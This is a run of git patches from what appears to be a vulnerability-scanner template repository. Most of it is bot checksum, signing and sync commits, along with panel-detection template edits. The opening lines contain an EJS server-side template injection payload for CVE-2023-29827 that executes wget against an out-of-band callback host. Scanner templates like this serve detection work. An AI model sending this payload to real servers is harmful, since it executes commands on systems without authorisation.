"{{BaseURL}}/page?settings[view%20options][closeDelimiter]=x%22)%3bprocess.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27)%3b//" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "You are viewing page number" From eb58a1f3500abdb7e3b34fd36c73ad90ef43b6d0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 13:38:48 +0530 Subject: [PATCH 230/375] added reference --- http/cves/2023/CVE-2023-29827.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2023/CVE-2023-29827.yaml b/http/cves/2023/CVE-2023-29827.yaml index 815a3b4813..5549e07aba 100644 --- a/http/cves/2023/CVE-2023-29827.yaml +++ b/http/cves/2023/CVE-2023-29827.yaml @@ -10,6 +10,10 @@ info: High impact as it enables remote code execution. remediation: | Update EJS to the latest version to mitigate the vulnerability. + reference: + - https://github.com/mde/ejs/issues/720 + - https://github.com/mde/ejs/blob/main/SECURITY.md#out-of-scope-vulnerabilities + - https://nvd.nist.gov/vuln/detail/CVE-2023-29827 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 From 726a7b1ee1a9d955a80a0d078b50c18f78dea935 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:23:55 +0000 Subject: [PATCH 231/375] Auto Generated New Template Addition List [Tue May 14 08:23:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2521506a46..9803dc95c1 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-45855.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml From df1b12fbae4add9a2c93c2ca5771235fb257c737 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:24:00 +0000 Subject: [PATCH 232/375] Auto Generated Templates Checksum [Tue May 14 08:24:00 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4dd9ad8040..28e16afb27 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -547,7 +547,7 @@ file/malware/vertex-malware.yaml:dbbbe626d020ae4d7bbd344de80b6a54835ec6b5 file/malware/virusrat-malware.yaml:26139365e8bc1b4ca2b45a9490c34b19f986215e file/malware/wabot-malware.yaml:7d2630471fae89dc585a6cbd284f9bf29e6259d7 file/malware/wannacry-malware.yaml:4d955739e936b2e11fa054b66bb3bcae8b924b49 -file/malware/warp-malware.yaml:7a6eca365d2cc7890bfe29d51c03e3b248372d44 +file/malware/warp-malware.yaml:9c9807f855164bb0900194f0ed48bd194d310ea5 file/malware/xhide-malware.yaml:1014bac698098d85b1de13cce518523719c41021 file/malware/xor-ddos-malware.yaml:f5b4f72a7b0ed38d9d6010429fe0bb69181383ce file/malware/yayih-malware.yaml:d0632e660caa87b47d08a264fd0625d587900dc8 @@ -3758,6 +3758,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6 +http/exposed-panels/easyvista-panel.yaml:d90cc7e932cc4c14ded7167fdc585c752cd1c1b2 http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229 http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152 http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa @@ -8519,7 +8520,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:babc7e838e9005be6a08c999aa2eebb3e7b4d671 +templates-checksum.txt:2a9f7933ab20dfa35729172c0253f5944cb98e39 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From dd06ab1d32300e5100cdf438d3bb9f2e26d9ea63 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:24:35 +0000 Subject: [PATCH 233/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 8fe50254e8..948394baa9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -10,6 +10,7 @@ on: - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/easyvista-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' From 2c48020d6190685946b52dd5d962e8b5894f1853 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:24:42 +0000 Subject: [PATCH 234/375] Auto Generated Templates Checksum [Tue May 14 08:24:42 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 28e16afb27..f1f75a2c91 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6746,6 +6746,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02 http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0 +http/technologies/imgproxy-detect.yaml:b26f7167174072110d8a505954a547a394e18569 http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5 http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9 http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe @@ -8520,7 +8521,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2a9f7933ab20dfa35729172c0253f5944cb98e39 +templates-checksum.txt:648e52b53c9f33bd7c3368abf19c1aad2fd6f6c0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 77ac29024cb48bd6f1d3c1a8b77927433f0099b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:25:52 +0000 Subject: [PATCH 235/375] Auto Template Signing [Tue May 14 08:25:52 UTC 2024] :robot: --- http/exposed-panels/easyvista-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index d21e0aea11..7429e53e96 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -32,4 +32,5 @@ http: group: 1 regex: - '(?i)package:\s+"([a-z0-9._-]+)"' - - '(?i)version : ([a-z0-9._-]+)' \ No newline at end of file + - '(?i)version : ([a-z0-9._-]+)' +# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From de221abcf61498efcf2a26f76d52f3dd1822a3f6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:27:17 +0000 Subject: [PATCH 236/375] Auto Generated New Template Addition List [Tue May 14 08:27:17 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 9803dc95c1..d3edf142d4 100644 --- a/.new-additions +++ b/.new-additions @@ -7,6 +7,7 @@ http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml +http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml @@ -16,6 +17,7 @@ http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/apache/apache-answer-detect.yaml http/technologies/craftercms-detect.yaml +http/technologies/imgproxy-detect.yaml http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml http/technologies/uni-gui-framework.yaml From 1b8580b7a846abbc07110cd175deddefb22001ef Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:27:26 +0000 Subject: [PATCH 237/375] Auto Generated Templates Checksum [Tue May 14 08:27:26 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1f75a2c91..3b7c5f51fd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3758,7 +3758,7 @@ http/exposed-panels/e-mobile-panel.yaml:97952c73a01ba76b8f821e110326a5b8976c077c http/exposed-panels/eMerge-panel.yaml:128223c03da8481549810a42b35e3c8d88a478eb http/exposed-panels/earcu-panel.yaml:7d1924978269db09ab39f7d9bb8fbc89a069ebbc http/exposed-panels/easyjob-panel.yaml:e9d4d870309fc1b13a57009060dc9d7abd9ecef6 -http/exposed-panels/easyvista-panel.yaml:d90cc7e932cc4c14ded7167fdc585c752cd1c1b2 +http/exposed-panels/easyvista-panel.yaml:a997baadb80031e6e50898c1cb0cd1bf3174902d http/exposed-panels/eclipse-birt-panel.yaml:99ec0cc6817e95c7b3b8a7025cb949db688a9229 http/exposed-panels/ecosys-command-center.yaml:b6e297af2f5896e0dcc0a4185eb6bcc5805c1152 http/exposed-panels/edgeos-login.yaml:7021c21f36e9df66be21c539248866415245f8aa @@ -4075,6 +4075,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229 http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213 http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847 http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82 +http/exposed-panels/n8n-panel.yaml:9109b87a2b31753aaaadb1f30cb4004f80e7fc29 http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6 http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138 http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad @@ -8521,7 +8522,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:648e52b53c9f33bd7c3368abf19c1aad2fd6f6c0 +templates-checksum.txt:26260a0cb9b52cc72381e58f1c17889fc76ccedf wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3c6bc5e2ebce7adfb4ec4eff745aee081ee04bb7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:27:57 +0000 Subject: [PATCH 238/375] Auto Generated New Template Addition List [Tue May 14 08:27:57 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3edf142d4..6f179d1d0d 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/exposed-panels/easyvista-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml +http/exposed-panels/pocketbase-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/honeypot/tpot-honeypot-detect.yaml From 9214b8e8de16f4536f27adc5d99469092697d2f7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:28:00 +0000 Subject: [PATCH 239/375] Auto Generated Templates Checksum [Tue May 14 08:28:00 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b7c5f51fd..12a5702e39 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4209,6 +4209,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674 http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6 http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c +http/exposed-panels/pocketbase-panel.yaml:25abff181c32afb59827557e42ba90e44daf471b http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01 http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403 @@ -8522,7 +8523,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:26260a0cb9b52cc72381e58f1c17889fc76ccedf +templates-checksum.txt:98a538c2fadfc2c0a43e22982ec06cd7dcaf44fb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 649614b041d731c35d473bb4718471c443a7abc1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:28:00 +0000 Subject: [PATCH 240/375] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 948394baa9..0832677638 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -12,6 +12,7 @@ on: - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' + - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' @@ -21,6 +22,7 @@ on: - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/apache/apache-answer-detect.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/imgproxy-detect.yaml' - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' - 'http/technologies/uni-gui-framework.yaml' From 5f6a8f24c221cec3111c819f1887b8bd1ff73249 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:28:42 +0000 Subject: [PATCH 241/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0832677638..96cb16f0ad 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -14,6 +14,7 @@ on: - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' + - 'http/exposed-panels/pocketbase-panel.yaml' - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/honeypot/tpot-honeypot-detect.yaml' From 03b60d4434d38822a243b11e853d5d7642ab7116 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:29:12 +0000 Subject: [PATCH 242/375] Auto Template Signing [Tue May 14 08:29:12 UTC 2024] :robot: --- http/exposed-panels/n8n-panel.yaml | 1 + http/technologies/imgproxy-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index b7c335adb8..624de3d45d 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022059cb68de4684a6a5b94dca8dbf24660e161eecceb07d6a955c1fa897ba7713da02200a3ec6dda7bffc4b05016a3055540bfb789fead4544178489fd6494c108cd483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/imgproxy-detect.yaml b/http/technologies/imgproxy-detect.yaml index e61b94f7cc..f9df84d1e9 100644 --- a/http/technologies/imgproxy-detect.yaml +++ b/http/technologies/imgproxy-detect.yaml @@ -25,3 +25,4 @@ http: - 'status_code == 200' - 'contains(server, "imgproxy")' condition: and +# digest: 4a0a004730450221008dd8dabb9994876588a503140ed178a1de79fd8d1480c39fa4b046a06bc0363e02205805ad81daf64a85cf31f1e2f77dce657a89048a1c2db57fb59ed2c1ee78b443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 871b5a69625960536068e6d20e0ed6eae7ce73c0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:29:17 +0000 Subject: [PATCH 243/375] Auto Generated New Template Addition List [Tue May 14 08:29:17 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6f179d1d0d..4b8d4ddbaa 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/ackee-panel.yaml http/exposed-panels/craftercms-panel.yaml http/exposed-panels/easyvista-panel.yaml +http/exposed-panels/ghost-panel.yaml http/exposed-panels/matomo-panel.yaml http/exposed-panels/n8n-panel.yaml http/exposed-panels/nocodb-panel.yaml From b24824117067616066da1bb9bcefab811aa8615f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 14 May 2024 08:29:23 +0000 Subject: [PATCH 244/375] Auto Generated Templates Checksum [Tue May 14 08:29:23 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 12a5702e39..8d50047ecf 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3840,6 +3840,7 @@ http/exposed-panels/genweb-plus-panel.yaml:722cb54cc9efc1b84972c6d80c994282efb8f http/exposed-panels/geoserver-login-panel.yaml:c62e462b728c52ae197f5b0446ae908f3401a935 http/exposed-panels/gerapy-detect.yaml:724d1afda108c6a2912bcc793046063e26909b86 http/exposed-panels/gespage-panel.yaml:57eee82ad1606862ed17208b8ff03a7cdba0cb16 +http/exposed-panels/ghost-panel.yaml:de0612cb4c27c9c6fc25fc78e71a5f7ece5dc141 http/exposed-panels/gira-homeserver-homepage.yaml:c88f54ceb96676698f89520661b9594f644d6fc2 http/exposed-panels/git-repository-browser.yaml:5b9b836099213deb45e0d441e5cb66224cf5c8a5 http/exposed-panels/gitblit-panel.yaml:8b14a008bde650f9f125c4b930c2908aa6b95334 @@ -8523,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:98a538c2fadfc2c0a43e22982ec06cd7dcaf44fb +templates-checksum.txt:8ba4dfb0611690abdfca9989ff1f95c2d909e742 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e5318cb247a2403c7e0cb6e1537c7f95267547fe Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 14 May 2024 08:29:59 +0000 Subject: [PATCH 245/375] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 96cb16f0ad..20013269d7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -11,6 +11,7 @@ on: - 'http/exposed-panels/ackee-panel.yaml' - 'http/exposed-panels/craftercms-panel.yaml' - 'http/exposed-panels/easyvista-panel.yaml' + - 'http/exposed-panels/ghost-panel.yaml' - 'http/exposed-panels/matomo-panel.yaml' - 'http/exposed-panels/n8n-panel.yaml' - 'http/exposed-panels/nocodb-panel.yaml' From 955d988a871927e87170b961a19bdb947bf8ae38 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 14 May 2024 14:04:52 +0530 Subject: [PATCH 246/375] updated matchers --- http/exposed-panels/jfrog-login.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 8f9d6a30af..437f62cf28 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"JFrog" - verified: true tags: panel,jfrog,edb,detect,login http: @@ -24,13 +24,9 @@ http: - '{{BaseURL}}/ui/favicon.ico' stop-at-first-match: true - matchers-condition: or matchers: - - type: word - words: - - 'JFrog' - case-insensitive: true - - type: dsl dsl: + - 'status_code==200 && contains(body, "JFrog")' - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" + condition: or From 13188c78b8c80785ffc16f584333686272812878 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:38:59 +0000 Subject: [PATCH 248/375] Auto Generated Templates Checksum [Tue May 14 08:38:59 UTC 2024] :robot: --- templates-checksum.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d50047ecf..3189f9ca22 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3954,7 +3954,7 @@ http/exposed-panels/jeedom-panel.yaml:3fb84bbcfa09ce6964cb2dce502f417498bf82b4 http/exposed-panels/jellyseerr-login-panel.yaml:51a7c1b5d8b5e3f8169bbc8abd9941821477fc41 http/exposed-panels/jenkins-api-panel.yaml:0ba41d9daabab4714bcf58808cfc661c9e9310f2 http/exposed-panels/jenkins-login.yaml:89b0f8e296398a825248bd82947ca61fce3c2a7c -http/exposed-panels/jfrog-login.yaml:07f159d0ee368ce3c235933c257e7781cf687890 +http/exposed-panels/jfrog-login.yaml:c9a40806e3a7ffa48d47ce407b6efa9a563faf56 http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3 http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf @@ -4076,7 +4076,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229 http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213 http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847 http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82 -http/exposed-panels/n8n-panel.yaml:9109b87a2b31753aaaadb1f30cb4004f80e7fc29 +http/exposed-panels/n8n-panel.yaml:9d42e6a43dd7de68c76bf38cfd681275147517e5 http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6 http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138 http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad @@ -6749,7 +6749,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02 http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0 -http/technologies/imgproxy-detect.yaml:b26f7167174072110d8a505954a547a394e18569 +http/technologies/imgproxy-detect.yaml:a5819e528c4e6c397c971fe78e49fb76ba0e6820 http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5 http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9 http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe @@ -8524,7 +8524,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8ba4dfb0611690abdfca9989ff1f95c2d909e742 +templates-checksum.txt:6862472e7fcdfc3c1e6dd93385379527dad55a95 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 5aab7bcbd85a5520cc96ee9ffd1089039db3cdf2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 14 May 2024 08:40:42 +0000 Subject: [PATCH 249/375] Auto Template Signing [Tue May 14 08:40:42 UTC 2024] :robot: --- http/exposed-panels/ghost-panel.yaml | 1 + http/exposed-panels/jfrog-login.yaml | 1 + http/exposed-panels/pocketbase-panel.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index 25714ff071..16405a4dfa 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -28,3 +28,4 @@ http: - 'content="Ghost"' condition: or case-insensitive: true +# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 437f62cf28..73afbece5f 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -30,3 +30,4 @@ http: - 'status_code==200 && contains(body, "<title>JFrog")' - "status_code==200 && 